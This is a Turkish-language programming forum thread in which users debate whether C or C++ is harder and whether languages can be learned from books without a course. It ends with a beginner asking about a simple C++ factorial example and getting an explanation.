+ Kursa gidilmeden deneyim şu şekilde alırsınız ezberci bir yapıya sahip olursunuz ve bu sizin için yararlı olmaz. Bu işe yıllarını adamış birkaç arkadaşım var istediğiniz şeyi size sunabiliyor sunabilmesinin nedeni tecrübesi , tecrübesi ise ezbere dayalı ve ciddi kritik problemleri çözemiyor ve takılıyor

Yanlış olan düşünce şudur ki if yapısını bilmek for yapısını bilmek ve bunları kullanarak ufak çaplı birşeyler yapmak.. Programcılık bu değildir .. Herkez şahsi düşüncesini yazıyor sizin gözünüzde dil bilmek bu olabilir..

Size şöyle örnek vereyim. Sultanahmet te topaç satan 15 yaşında çocuklar var 10 dilin üzerinde konuşuyorlar her bir dilden 10 - 20 cümle biliyorlar.. Bu dilleri konuşması bu dili bildiği anlamına gelmez birgün bir müşterisi öyle bir cümle kurar ki , öyle bir soru sorarki cocuk öyle kala kalır orada

Umarım birşeyler anlatabilmişimdir..

Onur2200 bildiğim bir adres yok fakat mecidiyeköy civarlarında bu tarz eğitim veren yerlerin var olduğunu duymuştum biraz araştırma ile doğru adresi bulabileceğiniz kanısındayım.Kolay gelsin

ubuntu
06/03/2007, 13:05
Benim kursa gitme ihtimalim hiç yok çünkü yaşadığım şehirde kurs yok. Mesutbarlas senin söylediklerine göre ben sadece ezberci olabilirim çünkü kursa gidemeyeceğim :garip: Adaletmi bu şimdi :aglama:

mesutbarlas
06/03/2007, 13:10
ubuntu eğer kursa gitme ihtimaliniz yok ise ve C dilini öğrenmek istiyorsanız bence C den önce C den daha kolay kullanıcıya daha çok hitap eden programlama dillerine bir göz atın misal Pascal veya visualbasic den başlayabilirsiniz ..

Görsel kitaplar piyasada mevcut C için C++ nesneye yönelik programlama olsun ve bu konuda yazılmış birçok kitap var tabiki bunlar yeterli gelmeyecektir fakat birşeyler bilmek hiçbirşey bilmemekten daha iyidir en azından içinzde bunun burukluğu kalmaz ve konu hakkında çat pat bile olsa bir bilgiye sahip olursunuz..

Kurs imkanı olmayanlar için Yazılım şirketleri vardır Şirket mensuplarının görüşüne göre değişir tabiki fakat para teklif etmeden yani parasız işçi olarak çalışmanızı kabul ederlerse yazılım şirketlerinden de bilgi edinebilirsiniz yeterki isteyin

KamilORS
06/03/2007, 13:54
Bence zor veya kolay dil diye bişey yok. Bence algoritma zor olandır. algoritma kurmayı bir öğrendinizmi dil sorunu ortadan kalkar. C Türevi dillerin söz dizimi biraz kalmaşık gelebilir neredeyse tüm ({ [] } < > ; ) gibi karaketerleri içererek yazmak gerektiğinden fakat bence c++ söz dizimini kontrol etmek bir pascal dan daha kolay. begin end yerine küme parantezi açar kapatırım.

Dediğinim gibi söz dizimi sizi korkutmasın.. önemli olan algoritma.. mesala bir programı yazmadan önce algortima şemasını çizin. daha sonra aynı şemayı kontrol ederek aynı programı farklı dillerde yazarsınız olur biter. Artı söylmemişsin ya yok colsole açılıyor filan filan. Konsol bu işin tabanı. Windows programlamanın alt yapısına baktığn zaman çok karmaşık olacağını göreceksin. İçinde hiç bişey olmayan bir Windows penceresi bile oluşturmak 60 - 70 satır kod yazman gerekecek. vbasic diyorsun ya işte vbasic kullanarak programnlama yaptığn deryeyici senin yerine bu kodları yazıyor sadece sana kontroller le program yazmak kalıyor. Aynı şey Diğer Görsel programlama araçlarında da geçerli. Yani Görsel programlama için programı yazacağın dilin söz dizimine aşina olman yeterli kalıyor.

vStudio.Net 2005 incelemeni öneririm. Arayüz tamamen aynı. yani c# ile kullanacağın kontroller veya vbasic olsun veya c++ hepsinde kontroller aynı. değişen dil söz dizimi.

Bence sen ilk önce algoritma kurmayı öğren sonra bir dilde karar kılll..

Birde C/C++ Popiler olmasının nedeni sistem mühendisleri ve elektronik devrelerin kontrolü için en idaal olması ... yani hem makina diline yakın hemde İnsanların anlayabileceği dile yakın...

Unutma Algoritma Mantığını kap gerisi kolay...

Salıcaklaa...

Ansugo
06/03/2007, 14:15
Yanlış olan düşünce şudur ki if yapısını bilmek for yapısını bilmek ve bunları kullanarak ufak çaplı birşeyler yapmak.. Programcılık bu değildir .. Herkez şahsi düşüncesini yazıyor sizin gözünüzde dil bilmek bu olabilir..

Size şöyle örnek vereyim. Sultanahmet te topaç satan 15 yaşında çocuklar var 10 dilin üzerinde konuşuyorlar her bir dilden 10 - 20 cümle biliyorlar.. Bu dilleri konuşması bu dili bildiği anlamına gelmez birgün bir müşterisi öyle bir cümle kurar ki , öyle bir soru sorarki cocuk öyle kala kalır orada

Biz bu dilleri akademik tartisma yapmak, kitaplar yazmak, bu iste master, doktora yapmak icin ogrenmiyoruz. Bizim dilleri ogrenmemizdeki amac sorunlari kolay yoldan cozmek ya da sorunlara cozumler uretmek.

Haliyle sultanahmet'te her dilde 10-20 cumle bilen cocuk bir cozum uretmistir ve cozumu is gorecek duzeydedir.

Sonucta ben tanri icin degil insanlar icin programlama yapiyorum. Insanlar benim yaptigimi kullanabiliyorlarsa bu benim programlama bildigimi gosterir. Cunku sonuc olarak varolan bir sorunu kolay yoldan cozmusumdur. Ya da varolan sorunlara onceden verilmis cozumleri gelistirmis daha etkin bir cozum sunmusumdur.

Yani olaya teoelojik, idealistik, akademik, vb birsey olarak bakmamak lazim. Zira olaya boyle bakarsak programlama dillerinin arac degil amac oldugu yanilgisina kapilabilir. Ve acikcasi cogu kisinin (ben dahil) umrumda degil bunlar. Umrumda olmasi gerektiginde de mevcut bilgime bilgi katmam hic de zor degil. Sonucta bu bilgi kumesi kimseye patentli degil, acip ogrenebilirim.

mesutbarlas
06/03/2007, 14:47
Kitaptan projenizde takıldığınız bir kısmı çözemezsiniz ve kitaba bakarak nerede hata yaptım diye öğrenemezsiniz.. Ve Sultanahmetteki çocuğun bilgileri ise ezbere dayalıdır . Problem bu olunca isteğe bağlı yazılım üretemezsiniz eğer isteğe bağlı yazılım üretemiyorsanız programcı değilsiniz bu bir bir daha iki. Müşterinin sizden talep ettiği programı yazamayacak kapasitede iseniz programcı değilsiniz. Sultanahmetteki topaç satan bir çocuğa Farklı bir şekilde yaklaş daha önce duymadığı bir cümle takılıp kalacaktır Dolayısı ile belirli bir altyapıya sahip olmazsanız takılıp kalacaksınız. Yukarıda arkadaşımızın dediği gibi asıl temel olan algoritmadır algoritma biliyorsanız herşey daha kolaylaşıyor Bunun yanında programlama dilinin , derleyicinin iç yapısınıda bilmeniz gerekiyor .

Sultanahmetteki çocuk çözüm üretmemiştir. Eğer İsteğe bağlı yazılım düzenleyebilecek seviyede iseniz Programcısınız ve çözüm yaratabilirsiniz. Solüsyon yaratabilirsiniz ..

Ya yoksa programcı değilsiniz programcı adayısınız.

Ansugo
06/03/2007, 15:05
Kitaplarda hersey yaziyor diyen var mi?

Ama takildigim yerde arastirma yapmami ne engelliyor? Ben tanri miyim ki hic takilmadan islerimi goreyim?

Algoritmayi da yanlis kullanmissiniz. Asil temel olan algoritmadir lafini cok yerde gorurum ama bu kullanim yanlis. Programlama dilinin algoritmasi filan olmaz. Bir problemin cozum yoludur algoritma. Programlama dillerinde n bir dogal sayi iken n sonsuza kadar gider turunde bir cozum yolu varyasyonu oldugu icin oldukca yoruma acik birsey algoritma lafi.

Sultanahmetteki çocuk çözüm üretmemiştir.

Bakin olayi cozumleyelim.

1. Amac : Daha cok kisiye simit satmak.
2. Arac : Dil
3. Cozum : Araclardan yararlanarak amaca ulasmak

Yani sultahahmetteki simitci bir amac icin araclari kullanarak cozum uretmistir.

Ayni seyi bir bilgisayar programina uygulayalim :

1. Amac : Bir program yazmak.
2. Arac : Bir Dil
3. Cozum : Arac ya da araclari kullanarak amaca ulasmak yani bir program yazmak.

Dili bir idealist tavirla felsefe gibi gosterirken nesnellikten uzaklasip gozardi ettiginiz seyler var.

Simdiye kadar takilipta cozmek istedigim ve cozemedigim bir sorun olmadigini da belirterek konuyu kendi acimdan sonlandirayim.

Euclides
06/03/2007, 19:29
:)

Linux c dilinde yazılmıştır 25 komutlamı yazılmış :) Yapmayın allah aşkına bilmiyorsanız yorum yapmayın.. Assembler le karıştırdın sanırım :)

1.) Evet eğer okuma zahmetine katlansaydınız linux çekirdeğinin C bölümünün sadece yaklaşık "25 komutla"'la yazıldığını görürdünüz.(Ki bir bölümüde assembly'la yazılmıştır)

2.) "Assembler" assembly derleyicsi anlamına gelip tek başına bir anlam taşımaz. (Tıpkı "compiler" gibi) Hiçbir "assembler" standartı bulunmamaktadır.

Şimdi bi C kütüpanelerini açın bakın 10 binlerce fonksyon ile karşılaşacaksınız , sırf bunların hepsini öğrenebilmek bile yıllar alacaktır.
Siz hiç logaritma cetveli ezberleyen mühendis gördünüz mü ? Belki de asıl soru siz hiç hayatınızda bir programlama problemi ile karşılaştınız mı ? Yanlış anlamayın sizi kınamıyorum fakat daha çok bilgisayar bilimi ile uğraştıkca genel kabul gören doğrulara -bir başka değişle bilime- daha çok yaklaşacağınızı düşünüyorum.

turker
06/03/2007, 20:39
c# ile java, c++ ile delphi kıyaslanır genelde. bunlar ile kıyaslandığında vb pek çok konuda yetersiz kaldığı için vb öğrenmeyin derler ama vb de orta boy masa üstü uygulamaların altında kalkabiliyor, özellikle word,excel,autocad gibi programlara çeşitli yamalar veya makrolar yapmak için çok fazla kullanılıyor.

acehreli
06/03/2007, 20:46
mesutbarlas, keyword sozcugunu bu baglamda hangi anlamda kullaniyorsunuz? Ben de Euclides'in kullandigi anlamda kullaniyorum: bir programlama dilinin anahtar sozcukleri. Sizin soylediginiz if ve for gibi anahtar sozcukler Kernighan ve Ritchie'nin kitabinda 32 adet olarak listelenmislerdir.

C dili bu yuzden cok kolaydir. Bir avuc kadar olanagi ogrenmek dili ogrenmeye yeter.

Dil ogrenmenin programci olmaya esdeger olmadigini herkes biliyor zaten; ama burada soylenen o degil. Euclides C ile C++ dillerini kolaylik zorluk acisindan karsilastirmis. Ben de bu konuda ayni fikirdeyim. C dili (programcilik degil!) cok kolay ogrenilir. Icinde ogrenmesi zor olan bir kac kavram vardir o kadar. Ornegin isaretciler, dizilerin islevlere kopyalanarak gonderilmedikleri, vs.

Bunun yaninda C++ dilinin anahtar sozcukleri Stroustrup'un kitabina gore 63 tane. C++'in olanaklarinin birbirleriyle iliskileri, islev yukleme gibi olanaklari, nesneye yonelik programlamayi destekledigi olanaklari, vs. hep zor kavramlardir.

C'de malloc ile ayirdigini free ile unutmamak gibi basit bir kural, C++'ta aykiri durumlar (exceptions) nedeniyle islemez. Aykiri durumlar nedeniyle islevlerden ongorulemez zamanlarda ve gorunmez noktalarda cikilabilme olasiligi, programlamaya bambaska bir yaklasim gerektirir. Bunun gibi ozellikler, C++'i C'den daha zor bir dil yapar.

C referans kitabi 250 sayfayken, C++'in referans kitabi 1000 sayfadan fazla.

C'nin kutuphanesini ogrenmek icin de bir veya iki kitap yeter. C++ icin Scott Meyers'in Herb Sutter'in kitaplarini okumak gerekir.

Baskalarindan duyduklarimla da destekledigim kisisel gorusum, "C'ci" olmak icin en fazla bir yil gerekirken, "C++'ci" olmak icin en az uc yil gerektigidir. Ornegin ben, fazla akilli olmadigim icin, aykiri durumlarin ne kadar onemli olduklarina besinci senemde uyandim. Aslinda butun C++ camiasi buna besinci yillarinda uyandi. Aykiri durumlarin varliginda dogru programlar uretebilmek, endustrinin bes yilini aldi. Cozum comp.lang.c++.moderated gibi gruplarda tartisilarak uretildi ve ilk olarak Herb Sutter'in Exceptional C++ kitabinda belgelendi. Hicbir kurs bunlari anlatamazdi cunku bu bilinmiyordu.

Bir dili ogrenmek icin su kaynaklarin hepsi yararlidir:

- kitap
- arkadas
- forum
- dergi
- kurs
- okul
- vs.

Burada konumuz programcilik degil ama dillerin gucluk karsilastirmasi olsa da, kurslara verdiginiz oneme katilamiyorum. Cunku sizin de kendinizle celistiginiz gibi, kurslarda verilen bilgiler programcilik deneyimlerine degil, ogretme deneyimlerine dayanir. Ogretmenler programci olmadiklari icin projelerde calisanlarin deneyimlerini bilemezler.

Aslinda buna kitap yazarlari da dahildir. Ornegin Scott Meyers kendisini "koltuk programcisi" olarak degerlendirir. Isi programcilik degil, yazarlik oldugu icin, comp.lang.c++.moderated'a ugrar, kitabinda yazacagi konulari once programcilara danisir...

Yani bu kadar lafta ben ne dedim?

1) Keyword sozcugunu bizden farkli anlamda kullaniyorsunuz

2) Iyi programci olabilmenin zor oldugunu gosteriyorsunuz ama bu C dilinin C++'tan cok daha kolay oldugu gercegini degistirmez. Programcilik baska bir tartisma konusudur.

3) Kurslar yalnizca kaynaklardan birisidir

Ali

mesutbarlas
06/03/2007, 23:27
Kitaptan projenizde takıldığınız bir kısmı çözemezsiniz ve kitaba bakarak nerede hata yaptım diye öğrenemezsiniz.. Ve Sultanahmetteki çocuğun bilgileri ise ezbere dayalıdır . Problem bu olunca isteğe bağlı yazılım üretemezsiniz eğer isteğe bağlı yazılım üretemiyorsanız programcı değilsiniz bu bir bir daha iki. Müşterinin sizden talep ettiği programı yazamayacak kapasitede iseniz programcı değilsiniz.

Sultanahmetteki çocuk çözüm üretmemiştir. Eğer İsteğe bağlı yazılım düzenleyebilecek seviyede iseniz Programcısınız ve çözüm yaratabilirsiniz. Solüsyon yaratabilirsiniz ..

Yazdığım cümleleri tekrar hatırlatmak istiyorum.

Evet programlama zor bir beceridir. Hele ki C En zor dillerdendir , Assembly den sonra gelen dildir ki asm hex kodlarına karşılık gelir asm deki operatörlere opcommands dediğimiz komutların bir gelişmişi ise c de kullanılmıştır.

C dili için kolay bir dil diyenler kendini kandırmakla yetinirsiniz. Bugün gidin istanbulda oditoryumlar düzenleniyor BT olsun linux turkiye olsun birçok dernekler bulunmaktadır. Kanıma inanmayanlar gidip üstadların fikrini alabilirler.

1.) Evet eğer okuma zahmetine katlansaydınız linux çekirdeğinin C bölümünün sadece yaklaşık "25 komutla"'la yazıldığını görürdünüz.(Ki bir bölümüde assembly'la yazılmıştır)

Siz Linux geliştiricilerindenmisiniz ? Linux üzerine çalışmalar yapıyormusunz ki 25 komut üzerine kurulduğunu iddia ediyorsunuz..

Problem ile karşılaşmıyormusunuz diyorsunuz . Tabiki karşılaşıyorum gerek logic gerek critic gerek ise cpu tabanlı problemler. Temel bilgileriniz sağlam. örneğin aldığınız problem cpu üzerinde ise verilen crc den anlam çıkartıp yapıyı düzeltmek ( Yazımda bahsettiğim windows api , fonksyon bilmek gerekiyor dememin temel nedenidir.)
kolay gelecektir.
Fakat ezbere dayalı bir temel atmış iseniz yani yapısın bilmeden program yazmaya kalkışıyorsanız bu problemlerin altından kalkamayacaksınızdır.

Ne C dilini ne C++ dilini bu kadar kısa sürede tamamlayamazsınız. Boğaziçi Üniversitesi Mühendislik fakültesi öğretim görevlisi olan Prof. Dr. A. C. Cem Say hocanın dediği ve bir çok üstadın dile getirdiği gibi "C bir ömürdür, Ömür biter C bitmez" C dilinin ucu bucağı yoktur. Üstadların bile kullandığı cümlecikler "Orta düzey C Bilgisi"

Şayet önemli olan istenilen şeyin yapılmasıdır. Geliştirip geliştirmemek size kalmış..

Tekrar hatırlatıyorum Genel olarak tüm diller için Şayet isteğe bağlı yazılım üretebiliyorsanız , Bir firmanın isteklerini karşılayabiliyor ve isteğe bağlı yazılım üretebiliyorsanız Programcısınızdır.

onur2200
06/03/2007, 23:33
zaten en büyük korkumuz da bu... c dillerinin ucu bucağı olmaması...çok zor olcaktır ama biraz gayretle belki bir ihtimal öğreniriz...

acehreli
07/03/2007, 01:09
mesutbarlas, yine bir yanlis anlama yasiyoruz. Cem Say C'nin ucu bucagi olmadigini soylerken herhalde onunla yapilabilecek islerden bahsediyor olmali; dilin kendisinden degil. Cunku sonucta dilin tanimi belirlidir; gosterdigim gibi, 250 sayfalik bir kitap tamamini icerir. Cem Say'in ogrencileri bile, hatta benim gibi onun ogrencisi olamayacak bir yanilgan bile, butun sayfalari okuyup butun dili anlayabilir.

Eger olanaginiz varsa lutfen bunu Cem Say'a sorar misiniz. Eger bir yerde yaziliysa baglanti verirseniz cok sevinirim. Cunku ben Cem Say olsam, soylediklerimin boyle kisir bir tartismada bu kadar gereksiz bir amac icin kullanilmasindan rahatsiz olurdum. Hangi baglamda hangi zamanda soylemistir? Eger kaynak gosteremeyecekseniz ben o sozleri soylenmemis kabul etmek zorundayim.

Ayrica, lutfen bu tartismayi konu etrafinda tutalim. Iki tarafin ayri seyleri savundugu bir tartisma, her iki taraf da hakli oldugu icin hicbir zaman bitmez. Bu sirada da her iki taraf son derece komik duruma duserler, cunku her iki taraf da dogrulugu bariz olan seylere karsi tartisiyorlarmis gibi gorunurler.

Bir taraf sunu soyluyor: C++ C'den cok daha zordur. Ek olarak, C cok kolaydir.
Oteki taraf sunu soyluyor: Programcilik zordur.

Bunlarin her ikisi de dogru.

Eger siz birincisine karsi bir seyler soyleyecekseniz soyleyin; cunku burada konu bu. Eger programciligin zor oldugunu soyleyecekseniz hic soylemeyin cunku bunu herkes biliyor.

Ali

mesutbarlas
07/03/2007, 01:47
Benim savunduğum görüş bundan öte bir görüştür. C , C++ dillerinin kitap yordamıyla öğrenilemeyeceğidir (temel bilginiz yok ise).

Söylenen sözleri söylenmemiş sayabilirsiniz bu sizin şahsi düşünceniz.
Elimde bir çok dil üzerine yazılmış kitaplar mevcut. Hiçbir dili 250 sayfada öğrenemezsiniz , hiçbir dili tek kitaptan öğrenemezsiniz. Hele ki C :) ..

Neyse daha önceki postlarımda neler demek istediğim ap açık ortada. Bu konu hakkında son postumdur

Danışmak istediğiniz , paylaşmak istediğiniz görüş var ise pm atabilirsiniz.
Hepinize iyi çalışmalar.

ubuntu
07/03/2007, 02:00
İşte böyle olunca benimde kafam karışır bir yıldaha karar veremem. mesutbarlas kurs olmadan öğrenilmez diyor acehreli öğrenilir diyor :garip:
Başka bir arkadaş ingilizce şart diyor ama bir arkadaş çıkıp ingilizce olmasada öğrenilir diyor :garip: Ne yapacağım şimdi ben :aglama:

acehreli
07/03/2007, 02:06
Benim de kafam karisti aslinda. Bugune kadar C ve C++ bildigimi dusunuyordum. mesutbarlas kendimi kandirdigimi soyledi... :(

Ali

Sabahi
07/03/2007, 05:35
Ne yapacağım şimdi ben
@ubuntu, ogrenmede en onemli faktorlerden birisi dogru soruyu sorabilmektir. C++ zormudur, C mi ogrensem VB mi, ne yapacagim simdi ben gibi sorular ile bir yere varamazsiniz.
C++ mi ogrenmek istiyorsunuz? Biraz vakite, bir pc, bir derleyiciye ve ogrenmenize yardimci olacak okuyup anliyabileceginiz bir veya daha fazla kaynaga ihtiyaciniz var. Bunlara sahipseniz sormaniz gereken sorular:

Falanca C++ kitabindan alinti yaptigim su satirlari aciklayabilirmisiniz?
Ilisikteki kodu derlemeye calistim, su derliyiciyi kullandim su hatayi aldim nedenini izah edebilirmisiniz?
C++ ile DLL yazilimi konusunda turkce kaynaga ihtiyacim var. Bu konuda yardimci olabilirmisiniz?

turunde olmali. Elbette sordugunuz her sorunun cevabini bulamayacaksiniz ancak keyword ile komut arasindaki farki bile bilmedigi halde bilgiclik taslayan kisilerin getirdigi kafa karisikligi ve kisir tartismalar yerine cevap aldiginiz her soru ile biraz daha aydinlanacaksiniz. Bizlerde sacma sapan tartismalara girmek yerine bildigimiz konularda verdigimiz cevaplarla yararli olmus bilmedigimiz konularda baskalarinin verdigi cevaplardan ogrenmis olacagiz.

mesutbarlas
07/03/2007, 10:02
ancak keyword ile komut arasindaki farki bile bilmedigi halde bilgiclik taslayan kisilerin getirdigi kafa karisikligi ve kisir tartismalar yerine cevap aldiginiz her soru ile biraz daha aydinlanacaksiniz. Bizlerde sacma sapan tartismalara girmek yerine bildigimiz konularda verdigimiz cevaplarla yararli olmus bilmedigimiz konularda baskalarinin verdigi cevaplardan ogrenmis olacagiz.

Benim neyi bilip neyi bilmediğim sorusunu cevaplama hakkını kim size verdi ? Herşeyin bir düzeyi var ben düşüncelerimi aksederken asla hakaret düzeyine inmemişimdir. Ben kimseye sen bilmiyorsun diyemeyeceğim gibi sizde kimseye diyemezsiniz. Hele ki benim hakkımda böyle bir yorum yapma hakkını ben size vermedim seviyeyi düşürmemeniz ricamdır.

Bunlar sizin için kafa karışıklığı olarak görsenizde bunlar gerçeklerdir işin temel kısmıdır inanıp inanmamak size kalmış kimseye bana inanın demiyorum buyrun zamanla göreceksinizdir..

Euclides
07/03/2007, 10:16
Benim neyi bilip neyi bilmediğim sorusunu cevaplama hakkını kim size verdi ?... Ben kimseye sen bilmiyorsun diyemeyeceğim gibi sizde kimseye diyemezsiniz.

Geçmişteki mesajlarınız tam aksini gösteriyor ne yazık ki :(

mesutbarlas
07/03/2007, 10:23
Buyrun bana ilgili postu gösterin o zaman. Ben kimseye sen bilmiyorsun sen yapamazsın gibilerinden şahsa yönelik laf söylemedim. Postlarımdaki tüm sözler genellemedir. Buradaki arkadaşlarım değil herkezdir kastım.

Konu farklı mecralara kayıyor. Lütfen ben kimsenin şahsına yönelik küçük düşürücü bir yönelge belirtmedim tüm sözlerim genellemedir . Ricam sizinde aynı mûtamayı göstermeniz.

Kolay gelsin.

Ansugo
07/03/2007, 10:56
Buyrun bana ilgili postu gösterin o zaman. Ben kimseye sen bilmiyorsun sen yapamazsın gibilerinden şahsa yönelik laf söylemedim. Postlarımdaki tüm sözler genellemedir. Buradaki arkadaşlarım değil herkezdir kastım.

Hayatimda gordugum en kotu genellemelerden biri su :

Benim savunduğum görüş bundan öte bir görüştür. C , C++ dillerinin kitap yordamıyla öğrenilemeyeceğidir (temel bilginiz yok ise).

Kitaptan ogrenmeyi engelleyen ne?

Siz belki kursa gitmissinizdir, okula gitmissinizdir; bu sizin haliniz. Bir diger kisi kurs olmadan anlamayabilir, bu da o kisinin hali. Ama benim simdiye kadar varolan cogu tanidigim dilleri kitaplardan kendi cabalariyla ogrenmis durumdalar.

Hayir genelleme yapiyorsunuz ama ben bunu biliyorum, kitaplardan, arama motorlarindan dil ogrenip catir catir program yazan kisiler biliyorum. Onu geciyorum, kac yildir forumlarda once "programlamaya basliyorum" diye gelip iki sene sonra catir catir program yazip onumuze koyan adamlari bizzat goruyorum.

Siz de geliyorsunuz dil kitaptan ogrenilmez, soyledir boyledir.

Anlamadim, dili kitaptan ogrenip calismak icin bir engel mi var?

Dil kitaptan, manualdan, tutorialdan, aramalardan ogrenilmiyorsa nereden ogreniliyor?

acehreli yukarida dememis mi ben C++'i kursa gitmeden, bilgisayar bolumunde okumadan ogrendim diye? Iste canli ornek karsinizda duruyor. Hala neyi savunuyorsunuz anlamiyorum.

C'nin ucu bucagi yokmus. Iyi de hangi dilin ucu bucagi var? C 40 senelik bir dil. Surada 11-12 senelik Delphi'de bile binlerce bilesen, binlerce component, yuzbinlerce fonksiyon, prcedure var. Bugun hangi dili acip baksaniz ayni seyle karsilasirsiniz zaten.

Takmissiniz dil kitaptan ogrenilmez diye. Ben birakin kitabi manualdan dil ogreniyorum. Tam manasiyla kullanmaya baslamam diline gore belki 2-3 seneyi buluyor, ama sonuc degismiyor.

Haaa, sunu diyebilirsiniz. Yeni baslayan kisilerin C ile C++ ile baslamasi yanlis bir karar olur. Onun yerine, PHP PERL gibi bir dille baslamalari daha uygun olur. Bu dogru bir onerme olur. Birkac daha basit dilde birkac sene ugrastiktan sonra C C++ ile etkin programlar yazmak daha kisa surer. Ama bu gene de dilin kitaptan, arama motorlarindan ogrenilmeyecegi gibi yanlis bir dusunce cikarmaz ortaya.

Siz kitaptan ogrenemiyorsunuz diye herkesi kendiniz gibi sanip ona gore genelleme yapmayin. Zira ben tam aksini soyluyorum. Benim genellememe gore orta zekali temel mantik-matematik bilgisi almis her kisi her dili kitaplardan ogrenebilir. Sonucta yillardir gordugumuz ornekler de bunu ispatlar nitelikte.

mesutbarlas
07/03/2007, 11:36
Terbiyesizleşmeden post atın ! Siz kitaptan öğrenemiyorsunuz gibilerinden yorumlarda yapmayın yukarıda arkadaşımıza verdiğim cevabı sizede yazıyorum . Bir insanı tanımadan o şahıs hakkında şahsi görüş belirtmeyin. Benim bilgi derecemin neyi nerden öğrendiğimi nerden biliyorsunuz da böyle bir yorumda bulunabiliyorsunuz ?

İspat niteliğinde ise o zaman daha önce attığım postlardaki örnek kodun açıklamasını bana sunun !

Hala iddia ediyorum kitaptan öğrenilecek şeyler değil bunlar. Kurs veya birebir dersin önemi işin mantığını kavrayabilmenizdir. Hocanız size neyin nereden geldiğini , ne gibi özel durumlarda kullanıldığını ne gibi durumlarda kullanılamayacağını neyin nerde ne zaman kullanılacağını öğretir ve programlamacı mantığını oluşturur.

Tekrar tekrar bana aynı şeyleri yazdırıyorsunuz.

Dil kitap veya tutorial ler sayesinde geliştirilir temel atılmaz !

Açarsınız derleyicinizi veyahut misal veriyorum socket.handle nin iç yapısını internetten araştırısınız iç yapısını öğrendikten sonra socket.handle ye hakim olursunuz. Bunun için ise temel bilgiler gerekiyor.

Post atmadan önce sözlerinize dikkat ederek post atın. Ben bu tartışmada seviyeyi düşürmüyorsam sizinde düşürmeye hakkınız yok .

Çatır çatır program yazarsınız :) İsteğe bağlı program üretemezsiniz dolayısı ile programcı dahi olamazsınız. Kıyıda köşede kendi çapınızda projeler üretirsiniz. Bugün hiç programlama bilmeyen bile bu şekilde program yazabilir. Netice ? ... Vahim son...

HunTER
07/03/2007, 12:35
Referans sıstemının kalkması ıyı oldu aslında.. Ortalık bır anda gurudan gecılmez oldu.. Hangı konuya goz atsam bırı bırsey hakkında ahkam kesıyor..

Ama tavsıyem enerjınızı bu tur geyık konulara harcamayın.. Bakın cevap bekleyen onlarca soru var.. Hem bu ıddanızı kanıtlamak ıcın daha uygun bır alan..

Ansugo
07/03/2007, 12:40
Siz kitaptan öğrenemiyorsunuz gibilerinden yorumlarda yapmayın yukarıda arkadaşımıza verdiğim cevabı sizede yazıyorum . Bir insanı tanımadan o şahıs hakkında şahsi görüş belirtmeyin. Benim bilgi derecemin neyi nerden öğrendiğimi nerden biliyorsunuz da böyle bir yorumda bulunabiliyorsunuz ?

Siz kimi taniyorsunuz ki kitaplardan ogrenmeyecegini iddia ediyorsunuz? Biz sizi hic tanimiyoruz misal. Ama yazdiklariniza bakilirsa bizim simdiye kadar gordugumuz gercekler sizde uygulama alani bulamamis, yani kitaplardan birsey ogrenememissiniz. Bunu dile getirmekle gururunuz inciniyorsa ben birsey diyemem.

Çatır çatır program yazarsınız :) İsteğe bağlı program üretemezsiniz dolayısı ile programcı dahi olamazsınız. Kıyıda köşede kendi çapınızda projeler üretirsiniz. Bugün hiç programlama bilmeyen bile bu şekilde program yazabilir. Netice ? ... Vahim son...

Sizin parlak sonunuzu gorelim?

ubuntu
07/03/2007, 12:48
Matematiğim çok kötü hatta yok denebilir aynı şekilde ingilizcemde öyle. Peki ben bu c++ ı temeli ile birlikte kitaplardan ve internetten öğrenemezmiyim? Öğrenmek olarak söylediğim şey profösyonel olarak öğrenmek. Yani hertürlü sorun ile baş edebilirmiyim? Ya da her türlü programı yazabilme kabiliyetim olurmu?

HunTER
07/03/2007, 12:51
Ogrenemezsın dedıgımızde sonuc degısecek mı? Vaz mı gecıceksın? Oyleyse bırak ogrenme zaten.. Sahsı fıkrımı sorarsan, senın coktan ogrenmeye baslaman gerekıyordu.. Bu kadar kurcaladıgına gore programlama sana gore bır ıs degıl..

Eger agır olduysa kusuruma bakma..

ubuntu
07/03/2007, 13:18
Hayır ağır olmadı ama ben çoktan başlamıştım. Başladım fakat ileride sorun yaşamamak için düşüncelerinizi dikkate almak zorundayım. Ve bir yerde tıkanınca acaba sorusu geldi aklıma. Çalışırken faktöriyel ile ilgili bir örnek vardı ama hiç bir şey anlamadım. Acaba matematik bilgim yok diyemi anlamadım sorusu takıldı kafama. Onun için buraya yazdım.

#include <iostream.h>
int main()
{
int sayi;
long int faktoriyel=1;
cout << "Bir sayı giriniz: ";
cin >> sayi;
cout << sayi << " `in Faktöriyeli: ";
while (sayi > 1)
faktoriyel *= sayi--;

cout << faktoriyel << endl;
return 0;
}

while döngösünü öğretirken verdiği bir örnek bu. Diğer örneklerde while ı anladım fakat bu kafama fazlası ile karıştırdı.

Ansugo
07/03/2007, 13:28
Çalışırken faktöriyel ile ilgili bir örnek vardı ama hiç bir şey anlamadım. Acaba matematik bilgim yok diyemi anlamadım sorusu takıldı kafama. Onun için buraya yazdım.

Aynen oyle. Faktoriyel bir matematiksel islem. Eger faktoriyel islemi bilseydin o ornegi cok rahat anlayabilirdin.

Ama bu demek degildir ki sen faktoriyel bilmezken faktoriyel islemin ozelliklerini ogrenip ona gore kaliteli bir kod yazamayacaksin. Bu sadece bilgi eksikliginden kaynaklaniyor.

Ama telafi edilmeyecek ya da ogrenilmeyecek bir bilgi yok. O sebeple faktoriyelin ne oldugunu ogrenip aracı yani programlama dilini kullanarak amaca yani faktoriyel hesaplayan programa ulasabilirsin.

Konuyla alakali olarak soyle bir ornek verebilirim :

Bir httpd sunucudan bir dosya transfer edeceksindir. Ancak http'nin nasil oldugunu bilmiyorsundur. Once kaynaklardan http protokolunde kullanilan basliklari filan ogrenirsin. Sonra programinda bu basliklari kullanir ve veriyi httpd'den cekersin.

Yani bilgi eksikligin vardir en basta. Bu bilgi eksikligin programlama yapamayacagin anlamina gelmez. Cunku yukarida dedigim gibi eksigi kapatilamayacak hicbir bilgi yok. Sen programlama dili bilgine extra bilgiyi katar, yeni bilgilerini programlama bilginle harmanlayarak amaca ulasir, ortaya bir urun cikarirsin.

Zaten herseyi bilen bir insanin insan degil tanri oldugu varsayilir. Boyle birsey olmayacagina gore senin karsilastigin durum normal yani insansi bir durum. Ve cozebilecegin bir sorun.

HunTER
07/03/2007, 13:29
